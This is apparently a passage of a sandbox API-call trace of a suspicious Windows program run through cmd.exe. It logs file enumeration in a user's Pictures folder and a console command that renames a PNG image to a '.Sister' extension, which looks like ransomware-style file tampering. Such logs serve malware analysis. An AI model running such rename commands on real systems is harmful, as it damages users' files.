(lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.123] GetLastError () returned 0x2 [0293.123] ??_V@YAXPEAX@Z () returned 0x1 [0293.123] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.123] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.123] malloc (_Size=0xffce) returned 0x21ed984fae0 [0293.123] ??_V@YAXPEAX@Z () returned 0x21ed984fae0 [0293.123] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.123] GetLastError () returned 0x2 [0293.123] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.123] GetFileType (hFile=0x54) returned 0x2 [0293.123] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.123] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.124] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.124] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.124] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.124] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.130] longjmp () [0293.130] ??_V@YAXPEAX@Z () returned 0x1 [0293.130] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="F0Gamc8uxcBiM.png", cAlternateFileName="")) returned 1 [0293.130] GetProcessHeap () returned 0x21ed8c70000 [0293.130] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a2e0, Size=0xde) returned 0x21ed8c72790 [0293.130] GetProcessHeap () returned 0x21ed8c70000 [0293.130] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0xde [0293.130] GetProcessHeap () returned 0x21ed8c70000 [0293.131] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1b150 [0293.131] GetProcessHeap () returned 0x21ed8c70000 [0293.131] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1b150, Size=0x30) returned 0x21ed8d1b150 [0293.131] GetProcessHeap () returned 0x21ed8c70000 [0293.131] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1b150) returned 0x30 [0293.131] GetProcessHeap () returned 0x21ed8c70000 [0293.131] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1b190 [0293.131] malloc (_Size=0x1ff9c) returned 0x21ed985fac0 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc86d0 [0293.132] ??_V@YAXPEAX@Z () returned 0x1 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1b190, Size=0x190) returned 0x21ed8d1b190 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1b190) returned 0x190 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1b330 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1b330, Size=0x290) returned 0x21ed8d1b330 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1b330) returned 0x290 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1b5d0 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.132] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1b5d0, Size=0x30) returned 0x21ed8d1b5d0 [0293.132] GetProcessHeap () returned 0x21ed8c70000 [0293.133] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1b5d0) returned 0x30 [0293.133] GetProcessHeap () returned 0x21ed8c70000 [0293.133] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1b610 [0293.133] malloc (_Size=0x1ff9c) returned 0x21ed985fac0 [0293.133] GetProcessHeap () returned 0x21ed8c70000 [0293.133] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8950 [0293.133] ??_V@YAXPEAX@Z () returned 0x1 [0293.133] malloc (_Size=0x1ff9c) returned 0x21ed985fac0 [0293.133] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0293.133] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0293.133] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0293.134] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0293.134] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd94722f2, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd94722f2, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0293.134] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0293.134] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x4, dwReserved1=0x7, cFileName="F0Gamc8uxcBiM.png", cAlternateFileName="F0GAMC~1.PNG")) returned 0x21ed8c7cdc0 [0293.134] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0293.134] _wcsnicmp (_String1="F0GAMC~1.PNG", _String2="F0Gamc8uxcBiM.png", _MaxCount=0x11) returned 70 [0293.134] malloc (_Size=0x1ff9c) returned 0x21ed987fa70 [0293.136] ??_V@YAXPEAX@Z () returned 0x21ed987fa70 [0293.137] GetProcessHeap () returned 0x21ed8c70000 [0293.137] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8d50 [0293.137] ??_V@YAXPEAX@Z () returned 0x1 [0293.137] ??_V@YAXPEAX@Z () returned 0x1 [0293.137] GetProcessHeap () returned 0x21ed8c70000 [0293.137] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1b610, Size=0x190) returned 0x21ed8d1b610 [0293.137] GetProcessHeap () returned 0x21ed8c70000 [0293.137] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1b610) returned 0x190 [0293.137] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.137] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.137] GetFileType (hFile=0x50) returned 0x2 [0293.137] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.137] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.138] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.142] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.142] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.142] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.142] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.142] GetFileType (hFile=0x50) returned 0x2 [0293.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.142] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.143] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.143] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.143] GetFileType (hFile=0x50) returned 0x2 [0293.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.143] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.144] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.145] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d1b160*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d1b160*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.146] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"F0Gamc8uxcBiM.png\" \"F0Gamc8uxcBiM.png.Sister\" ") returned 48 [0293.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.146] GetFileType (hFile=0x50) returned 0x2 [0293.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.146] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.146] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.146] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0293.147] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.147] GetFileType (hFile=0x50) returned 0x2 [0293.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.147] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.147] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.147] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.148] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.148] GetFileType (hFile=0x50) returned 0x2 [0293.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.148] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.148] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.149] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.149] GetFileType (hFile=0x50) returned 0x2 [0293.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.149] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.149] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.149] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.150] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.150] GetFileType (hFile=0x50) returned 0x2 [0293.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.150] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.150] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.156] GetFileType (hFile=0x50) returned 0x2 [0293.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.156] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.156] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d1b5e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d1b5e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.157] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"F0Gamc8uxcBiM.png.Sister\" \"F0Gamc8uxcBiM.bat\" ") returned 48 [0293.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.157] GetFileType (hFile=0x50) returned 0x2 [0293.157] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.157] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.157] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0293.158] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.158] GetFileType (hFile=0x50) returned 0x2 [0293.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.158] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.158] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.163] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.163] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.164] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.165] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.165] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.166] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.166] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.166] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.166] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.166] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.166] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.166] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.166] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.166] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.166] ??_V@YAXPEAX@Z () returned 0x1 [0293.166] GetProcessHeap () returned 0x21ed8c70000 [0293.166] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6c150 [0293.166] GetProcessHeap () returned 0x21ed8c70000 [0293.166] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c150, Size=0x70) returned 0x21ed8d67c30 [0293.166] GetProcessHeap () returned 0x21ed8c70000 [0293.166] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67c30) returned 0x70 [0293.166] GetProcessHeap () returned 0x21ed8c70000 [0293.166] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8d679b0 [0293.167] GetProcessHeap () returned 0x21ed8c70000 [0293.167] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6ce70 [0293.167] GetProcessHeap () returned 0x21ed8c70000 [0293.167] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ce70, Size=0x70) returned 0x21ed8d674b0 [0293.167] GetProcessHeap () returned 0x21ed8c70000 [0293.167] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d674b0) returned 0x70 [0293.167] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.167] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.167] GetProcessHeap () returned 0x21ed8c70000 [0293.167] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cdc0 [0293.167] GetProcessHeap () returned 0x21ed8c70000 [0293.167] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a8f0 [0293.168] _wcsicmp (_String1="F0Gamc8uxcBiM.png", _String2=".") returned 56 [0293.168] _wcsicmp (_String1="F0Gamc8uxcBiM.png", _String2="..") returned 56 [0293.168] GetFileAttributesW (lpFileName="F0Gamc8uxcBiM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png")) returned 0x20 [0293.168] GetProcessHeap () returned 0x21ed8c70000 [0293.168] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d1b7b0 [0293.169] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d1b7c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.169] SetErrorMode (uMode=0x0) returned 0x0 [0293.169] SetErrorMode (uMode=0x1) returned 0x0 [0293.169] GetFullPathNameW (in: lpFileName="F0Gamc8uxcBiM.png", nBufferLength=0x7fe7, lpBuffer=0x21ed985fac0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png", lpFilePart=0xa6cf4fd660*="F0Gamc8uxcBiM.png") returned 0x2a [0293.169] SetErrorMode (uMode=0x0) returned 0x1 [0293.170] GetProcessHeap () returned 0x21ed8c70000 [0293.170] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a410 [0293.170] _wcsicmp (_String1="F0Gamc8uxcBiM.png", _String2=".") returned 56 [0293.170] _wcsicmp (_String1="F0Gamc8uxcBiM.png", _String2="..") returned 56 [0293.170] GetFileAttributesW (lpFileName="F0Gamc8uxcBiM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png")) returned 0x20 [0293.170] ??_V@YAXPEAX@Z () returned 0x1 [0293.170] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.170] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.170] malloc (_Size=0xffce) returned 0x21ed986faa0 [0293.170] ??_V@YAXPEAX@Z () returned 0x21ed986faa0 [0293.170] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png")) returned 0x20 [0293.171] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.171] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.171] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5a900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5a900) returned 0x21ed8cc8320 [0293.171] malloc (_Size=0xffce) returned 0x21ed988fa60 [0293.171] ??_V@YAXPEAX@Z () returned 0x21ed988fa60 [0293.172] ??_V@YAXPEAX@Z () returned 0x1 [0293.172] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F0Gamc8uxcBiM.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.173] FindNextFileW (in: hFindFile=0x21ed8cc8320, lpFindFileData=0x21ed8d5a900 | out: lpFindFileData=0x21ed8d5a900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F0Gamc8uxcBiM.png", cAlternateFileName="")) returned 0 [0293.178] GetLastError () returned 0x12 [0293.178] FindClose (in: hFindFile=0x21ed8cc8320 | out: hFindFile=0x21ed8cc8320) returned 1 [0293.178] ??_V@YAXPEAX@Z () returned 0x1 [0293.178] ??_V@YAXPEAX@Z () returned 0x1 [0293.178] ??_V@YAXPEAX@Z () returned 0x1 [0293.178] ??_V@YAXPEAX@Z () returned 0x1 [0293.178] GetProcessHeap () returned 0x21ed8c70000 [0293.178] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7b40 [0293.178] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c959a0, Size=0x16) returned 0x21ed8c955a0 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c955a0) returned 0x16 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45bf0 [0293.179] GetProcessHeap () returned 0x21ed8c70000 [0293.179] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bf0) returned 0x20 [0293.179] GetProcessHeap () returned 